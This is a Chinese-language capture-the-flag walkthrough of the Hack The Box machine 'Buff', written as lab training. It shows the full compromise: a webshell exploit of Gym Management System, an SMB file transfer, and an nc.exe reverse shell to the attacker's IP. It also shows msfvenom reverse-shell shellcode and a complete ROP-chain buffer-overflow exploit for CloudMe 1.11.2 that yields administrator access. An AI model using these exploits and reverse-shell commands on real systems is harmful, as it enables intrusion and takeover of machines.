Buff
1. User
1.1. Recon
1.1.1. Port Scan
┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# nmap 10.10.10.198 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-25 10:14 EDT
Nmap scan report for 10.10.10.198
Host is up (0.099s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
7680/tcp open pando-pub
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# nmap 10.10.10.198 -sU --top-ports 100
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-25 10:15 EDT
Nmap scan report for 10.10.10.198
Host is up (0.13s latency).
All 100 scanned ports on 10.10.10.198 are in ignored states.
Not shown: 100 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 21.43 seconds
1.1.2. dirsearch
┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# dirsearch -u http://10.10.10.198:8080/ -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/buff/reports/http_10.10.10.198_8080/__25-09-25_10-20-52.txt
Target: http://10.10.10.198:8080/
[10:20:52] Starting:
[10:21:02] 200 - 66B - /.gitattributes
[10:21:15] 200 - 5KB - /about.php
[10:21:40] 200 - 2KB - /cgi-bin/printenv.pl
[10:21:46] 200 - 4KB - /contact.php
[10:21:52] 200 - 4KB - /edit.php
[10:21:53] 503 - 1KB - /examples/
[10:21:53] 503 - 1KB - /examples/servlets/index.html
[10:21:53] 503 - 1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[10:21:53] 503 - 1KB - /examples/servlet/SnoopServlet
[10:21:53] 503 - 1KB - /examples/jsp/index.html
[10:21:53] 503 - 1KB - /examples/websocket/index.xhtml
[10:21:53] 503 - 1KB - /examples/jsp/snp/snoop.jsp
[10:21:53] 503 - 1KB - /examples/servlets/servlet/CookieExample
[10:21:53] 503 - 1KB - /examples/servlets/servlet/RequestHeaderExample
[10:21:53] 503 - 1KB - /examples
[10:21:55] 200 - 4KB - /feedback.php
[10:21:58] 200 - 143B - /home.php
[10:21:59] 301 - 341B - /img -> http://10.10.10.198:8080/img/
[10:21:59] 301 - 345B - /include -> http://10.10.10.198:8080/include/
[10:22:04] 200 - 18KB - /LICENSE
[10:22:05] 200 - 18KB - /license
[10:22:20] 301 - 345B - /profile -> http://10.10.10.198:8080/profile/
[10:22:21] 200 - 309B - /README.MD
[10:22:21] 200 - 309B - /README.md
[10:22:21] 200 - 309B - /readme.md
[10:22:21] 200 - 309B - /ReadMe.md
[10:22:21] 200 - 309B - /Readme.md
[10:22:24] 200 - 137B - /register.php
[10:22:34] 301 - 344B - /Upload -> http://10.10.10.198:8080/Upload/
[10:22:34] 200 - 209B - /up.php
[10:22:34] 301 - 344B - /upload -> http://10.10.10.198:8080/upload/
[10:22:35] 200 - 107B - /upload.php
Task Completed
1.1.3. 8080
注册页面,点击后就会跳转到主页
upload页面,报错出路径了,可以写shell
up.php 报错
Readme.md
提示存在一个 table.sql 可以获取到sql信息
contact.php
框架为 gym management system 1.0
保存脚本直接利用即可
┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# python2 exp.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun
C:\xampp\htdocs\gym\upload> id
�PNG
C:\xampp\htdocs\gym\upload> whoami /priv
�PNG
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
使用powershell弹命令,发现弹不了,这好像只是个webshell,而且使用certutil 也下载不了文件
C:\xampp\htdocs\gym\upload> bitsadmin /transfer test http://10.10.14.23/nc.exe c:\temp\nc.exe
�PNG
BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.
Unable to connect to BITS - 0x80070005
C:\xampp\htdocs\gym\upload> certutil -f -split -urlcache http://10.10.14.23/nc.exe
�PNG
<br />
<b>Warning</b>: shell_exec(): Unable to execute 'certutil -f -split -urlcache http://10.10.14.23/nc.exe' in <b>C:\xampp\htdocs\gym\upload\kamehameha.php</b> on line <b>3</b><br />
1.3. SMB Server
使用SMB服务器下载文件
┌──(root㉿kali)-[~/Desktop/tools]
└─# impacket-smbserver SHARE ./ -user user -password pass -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
C:\xampp\htdocs\gym\upload> net use \\10.10.14.23\SHARE /u:user pass
�PNG
The command completed successfully.
C:\xampp\htdocs\gym\upload> copy \\10.10.14.23\SHARE\nc.exe C:\Users\Public\nc.exe
�PNG
1 file(s) copied.
然后弹shell即可
C:\xampp\htdocs\gym\upload> C:\Users\Public\nc.exe -e cmd 10.10.14.23 1234
┌──(root㉿kali)-[~/Desktop/htb/buff]
└─# penelope -p 1234
[+] Listening for reverse shells on 0.0.0.0:1234 → 127.0.0.1 • 192.168.8.18 • 192.168.3.4 • 172.22.0.1 • 172.23.0.1 • 172.20.0.1 • 172.21.0.1 • 172.17.0.1 • 172.18.0.1 • 172.19.0.1 • 10.10.14.23
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from BUFF~10.10.10.198-Microsoft_Windows_10_Enterprise-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/BUFF~10.10.10.198-Microsoft_Windows_10_Enterprise-x64-based_PC/2025_09_25-11_05_02-453.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
C:\xampp\htdocs\gym\upload>
c:\Users\shaun\Desktop>type user.txt
type user.txt
59a757ee931e44f71e0b22d710b4fbba
2. System
2.1. mysql (无用)
C:\xampp\htdocs\gym>tree /F /A
[s[utree /F /A
Folder PATH listing
Volume serial number is A22D-49F7
C:.
| .gitattributes
| 4.jpg
| about.php
| att.php
| contact.php
| edit.php
| editp.php
| facilities.php
| Feedback.php
| home.php
| index.php
| LICENSE
| Navjeet.jpg
| New Text Document.txt
| packages.php
| README.md
| register.php
| register_success.php
| subfeed.php
| table.sql
| up.php
| upload.php
|
+---att
| matt.php
| matta.php
|
+---boot
| +---css
| | | bootstrap-theme.css
| | | bootstrap-theme.css.map
| | | bootstrap-theme.min.css
| | | bootstrap.css
| | | bootstrap.css.map
| | | bootstrap.min.css
| | | jquery-ui-1.10.4.custom.css
| | | jquery-ui-1.10.4.custom.min.css
| | | jquery.bxslider.css
| | | main.css
| | |
| | \---images
| | bg1.JPG
| | bg2.jpg
| | bx_loader.gif
| | controls.png
| |
| +---fonts
| | glyphicons-halflings-regular.eot
| | glyphicons-halflings-regular.svg
| | glyphicons-halflings-regular.ttf
| | glyphicons-halflings-regular.woff
| |
| \---js
| | bootstrap.js
| | bootstrap.min.js
| | dialog.js
| | forms.js
| | jquery.bxslider.js
| | jquery.bxslider.min.js
| | sha512.js
| | slide.js
| |
| \---plugins
| jquery.easing.1.3.js
| jquery.fitvids.js
|
+---ex
| | about.php
| | att.php
| | contact.php
| | edit.php
| | editp.php
| | facilities.php
| | home.php
| | index.php
| | Navjeet.jpg
| | packages.php
| | register.php
| | register_success.php
| | up.php
| | upload.php
| |
| +---admin
| | a.js
| | a.php
| |
| +---att
| | matt.php
| | matta.php
| |
| +---boot
| | | readme(forslide).md
| | |
| | +---css
| | | | bootstrap-theme.css
| | | | bootstrap-theme.css.map
| | | | bootstrap-theme.min.css
| | | | bootstrap.css
| | | | bootstrap.css.map
| | | | bootstrap.min.css
| | | | jquery-ui-1.10.4.custom.css
| | | | jquery-ui-1.10.4.custom.min.css
| | | | jquery.bxslider.css
| | | | main.css
| | | |
| | | \---images
| | | bx_loader.gif
| | | controls.png
| | |
| | +---fonts
| | | glyphicons-halflings-regular.eot
| | | glyphicons-halflings-regular.svg
| | | glyphicons-halflings-regular.ttf
| | | glyphicons-halflings-regular.woff
| | |
| | \---js
| | | bootstrap.js
| | | bootstrap.min.js
| | | dialog.js
| | | forms.js
| | | jquery.bxslider.js
| | | jquery.bxslider.min.js
| | | sha512.js
| | | slide.js
| | |
| | \---plugins
| | jquery.easing.1.3.js
| | jquery.fitvids.js
| |
| +---img
| | 1.jpg
| | 2.jpg
| | 3.jpg
| | 4.jpg
| | 5.jpg
| | 6.jpg
| | 7.jpg
| | 8.jpg
| | aerobics.png
| | cardio.png
| | cards.png
| | dc.png
| | fw.png
| | hb.png
| | lockerroom.png
| | spa.png
| | strength.png
| |
| +---include
| | db_connect.php
| | functions.php
| | logout.php
| | process_login.php
| | psl-config.php
| | register.inc.php
| |
| +---profile
| | | action.php
| | | delete.php
| | | edit.php
| | | fun.php
| | | i.php
| | | index.php
| | |
| | \---upload
| | gc.png
| |
| \---workouts
| index.php
|
+---img
| 1.jpg
| 2.jpg
| 3.jpg
| 4.jpg
| 5.jpg
| 6.jpg
| 7.jpg
| 8.jpg
| aerobics.png
| cardio.png
| cards.png
| dc.png
| fw.png
| hb.png
| lockerroom.png
| pr 2.pdf
| PROJECT REPORT(1) (1).pdf
| spa.png
| strength.png
| thumb.png
| w1.png
| wp_ss_20140416_0002.png
| wp_ss_20140416_0003.png
| wp_ss_20140416_0004.png
| wp_ss_20140416_0005.png
| wp_ss_20140416_0006.png
| wp_ss_20140419_0001.png
| wp_ss_20140419_0002.png
| wp_ss_20140419_0003.png
| wp_ss_20140422_0001.png
| wp_ss_20140516_0001.png
|
+---include
>>>> | db_connect.php
| functions.php
| logout.php
| process_login.php
| psl-config.php
| register.inc.php
|
+---profile
| | action.php
| | delete.php
| | edit.php
| | fun.php
| | i.php
| | index.php
| |
| \---upload
| gc.png
|
+---upload
| kamehameha.php
|
\---workouts
index.php
C:\xampp\htdocs\gym\include>type db_connect.php [s[utype db_connect.php <?php include_once 'psl-config.php'; // As functions.php is not included $mysqli = new mysqli("localhost", "root", "", "table"); ?>
这里面没有什么东西,
查看网络进程你可以发现本地8888端口开启了监听
C:\xampp\htdocs\gym\upload>netstat -ano | findstr TCP | findstr ":0"
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 956
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6252
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 8912
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 8136
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 528
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1072
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1540
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2340
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 688
TCP 10.129.25.107:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8264
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 6132
TCP [::]:135 [::]:0 LISTENING 956
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 8912
TCP [::]:8080 [::]:0 LISTENING 8136
TCP [::]:49664 [::]:0 LISTENING 528
TCP [::]:49665 [::]:0 LISTENING 1072
TCP [::]:49666 [::]:0 LISTENING 1540
TCP [::]:49667 [::]:0 LISTENING 2340
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 688
但是这个PID变换的特别频繁
可以用下面的命令获取对应的进程信息
C:\xampp\htdocs\gym\upload>for /f "tokens=5" %i in ('netstat -ano ^| findstr ":8888 "') do @tasklist /fi "PID eq %i" /v
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
CloudMe.exe 7908 0 37,296 K Unknown N/A 0:00:01 N/A
获取到它的具体位置
dir /s /b C:\*CloudMe*
C:\Users\shaun\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\WEIKCYS4\CloudMe_1112[1].exe
C:\Users\shaun\Downloads\CloudMe_1112.exe
第一个是浏览器缓存,第二个就是程序的位置了
CloudMe 是一个云存储同步软件,但它有一个著名的缓冲区溢出漏洞:
- CVE-2018-6892 - CloudMe 1.11.2 缓冲区溢出漏洞,而且这个正好与文件名字
CloudMe_1112.exe对上了,正好是这个缓冲区溢出的版本
2.2.1. 隧道搭建
漏洞利用策略如下图所示。使用 Python 2.7 启动后,“ROPChain.py”会向 CloudMe 监听的本地 8888 端口发送一条消息。由于存在漏洞,该消息的一部分(从第 1053 个字节开始)将被 Windows 解释:ROP Chain 将设置 VirtualProtect(),然后执行 shellcode,打开 calc.exe。
所以这里需要开一个代理把流量转发出来,这个用到 Stowaway 进行隧道搭建
先开一个Smbserver
┌──(root㉿kali)-[~/Desktop/tools/stowaway]
└─# impacket-smbserver share ./ -user user -password pass -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
然后连接、下载
C:\Users\shaun\Downloads>net use \\10.10.14.74\share /u:user pass
net use \\10.10.14.74\share /u:user pass
The command completed successfully.
C:\Users\shaun\Downloads>copy \\10.10.14.74\share\windows_x64_agent.exe
copy \\10.10.14.74\share\windows_x64_agent.exe
1 file(s) copied.
C:\Users\shaun\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Downloads
29/09/2025 16:33 <DIR> .
29/09/2025 16:33 <DIR> ..
16/06/2020 16:26 17,830,824 CloudMe_1112.exe
15/01/2025 08:16 2,278,912 windows_x64_agent.exe
2 File(s) 20,109,736 bytes
2 Dir(s) 8,828,096,512 bytes free
搭建代理
C:\Users\shaun\Downloads>windows_x64_agent.exe -c 10.10.14.74:4455
windows_x64_agent.exe -c 10.10.14.74:4455
2025/09/29 16:34:33 [*] Starting agent node actively.Connecting to 10.10.14.74:4455
[*] Starting admin node on port 4455
.-') .-') _ ('\ .-') /' ('-. ('\ .-') /' ('-.
( OO ). ( OO) ) '.( OO ),' ( OO ).-. '.( OO ),' ( OO ).-.
(_)---\_)/ '._ .-'),-----. ,--./ .--. / . --. /,--./ .--. / . --. / ,--. ,--.
/ _ | |'--...__)( OO' .-. '| | | | \-. \ | | | | \-. \ \ '.' /
\ :' '. '--. .--'/ | | | || | | |,.-'-' | || | | |,.-'-' | | .-') /
'..'''.) | | \_) | |\| || |.'.| |_)\| |_.' || |.'.| |_)\| |_.' |(OO \ /
.-._) \ | | \ | | | || | | .-. || | | .-. | | / /\_
\ / | | '' '-' '| ,'. | | | | || ,'. | | | | | '-./ /.__)
'-----' '--' '-----' '--' '--' '--' '--''--' '--' '--' '--' '--'
{ v2.2 Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 10.129.25.107:49694 is set up successfully! Node id is 0
(admin) >> use 0
(node 0) >> socks 1122
[*] Trying to listen on 0.0.0.0:1122......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >>
再配置好 proxychains 即可
2.2.2. shellcode
然后就是修改payload了
#生成 shellcode
┌──(root㉿kali)-[~/Desktop/htb/buff/Cybersecurity-ROPChain]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.74 LPORT=7788 -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of python file: 1604 bytes
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
buf += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
buf += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
buf += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
buf += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
buf += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
buf += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
buf += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
buf += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
buf += b"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
buf += b"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b"
buf += b"\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
buf += b"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a"
buf += b"\x0e\x4a\x68\x02\x00\x1e\x6c\x89\xe6\x6a\x10\x56"
buf += b"\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c"
buf += b"\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5"
buf += b"\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
buf += b"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
buf += b"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"
buf += b"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f"
buf += b"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
buf += b"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
buf += b"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
buf += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
修改 ROPChain.py 中的 shellcode
import socket
import struct
def create_rop_chain():
# 保持原有的 ROP 链不变
rop_gadgets = [
0x61ba8f81, # POP EAX # RETN [Qt5Gui.dll]
0x6210b0b0, # ptr to &VirtualProtect() [IAT Qt5Gui.dll]
0x61bdd7f5, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
0x61b63b3c, # XCHG EAX,ESI # RETN [Qt5Gui.dll]
0x0049f676, # POP EDI # RET [CloudMe.exe]
0x68cef5b4, # RET [Qt5Core.dll]
0x61c5ff72, # POP EBP # RET [Qt5Gui.dll]
0x66e2a5fe, # ptr to "push esp" [Qt5Xml.dll]
0x699d2d92, # POP EBX # RET [Qt5Network.dll]
0x00000201, # dwSize Value
0x6d9f7736, # POP EDX # RET [Qt5Sql.dll]
0x00000040, # flNewProtect Value
0x66e1a858, # POP ECX # RET [Qt5Xml.dll]
0x68db0e70, # lpflOldProtectWriting address [Qt5Core.dll]
0x007f8c38, # POP EAX # RET
0x90909090, # NOP [CloudMe.exe]
0x68a9fe85 # PUSHAD [Qt5Core.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
# 反弹 shell Shellcode
shellcode = (
b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
b"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
b"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
b"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
b"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
b"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
b"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
b"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
b"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
b"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a\x0e\x4a\x68"
b"\x02\x00\x1e\x6c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
b"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
b"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
b"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
b"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
b"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
b"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
b"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
b"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
)
# 关键修改:设置目标 IP 和 ROP 链
rop_chain = create_rop_chain()
target = "127.0.0.1" # 你的攻击机 IP
junk = "A" * 1052
# 计算填充
rmdr = b'\x44' * (3044 - len(rop_chain) - len(shellcode))
payload = junk.encode() + rop_chain + shellcode + rmdr
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, 8888))
s.send(payload)
print("Payload sent successfully!")
except Exception as e:
print(f"Error: {e}")
开启监听、运行exp
┌──(root㉿kali)-[~/Desktop/htb/buff/Cybersecurity-ROPChain]
└─# proxychains python2 ROPChain.py
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1122 ... 127.0.0.1:8888 ... OK
Sent payload: len(payload) = 4096
junk: 1052, rop: 68, shellcode: 324, rmdr: 2652
┌──(root㉿kali)-[~/Desktop/htb/buff/Cybersecurity-ROPChain]
└─# rlwrap nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.10.14.74] from (UNKNOWN) [10.129.25.107] 49698
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
reference